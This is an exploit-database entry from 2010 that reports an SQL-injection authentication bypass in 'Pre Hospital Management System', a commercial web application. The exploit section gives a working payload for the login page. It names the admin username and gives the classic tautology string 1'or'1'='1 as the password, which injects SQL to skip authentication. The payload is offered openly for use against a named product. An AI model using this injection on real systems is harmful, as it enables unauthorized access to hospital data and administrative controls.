id: 14828
date: 11/14/2010
title: Pre Hospital Management System SQL Bypass Vulnerability
author: Cru3l.b0y
cves: 

=======================================================
Pre Hospital Management System SQL Bypass Vulnerability
=======================================================

In The Name Of GOD
[+] Exploit Title: PRE HOSTPITAL MANAGEMENT SYSTEM SQL Bypass Vulnerability
[+] Date: 2010-11-13
[+] Author  : Cru3l.b0y
[+] Software Link: http://www.preproject.com/hms.asp
[+] Price : 750.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
 
            go to /login.php
            Username : Administration
            Password : 1'or'1'='1



#  0day.today [2023-03-24]  #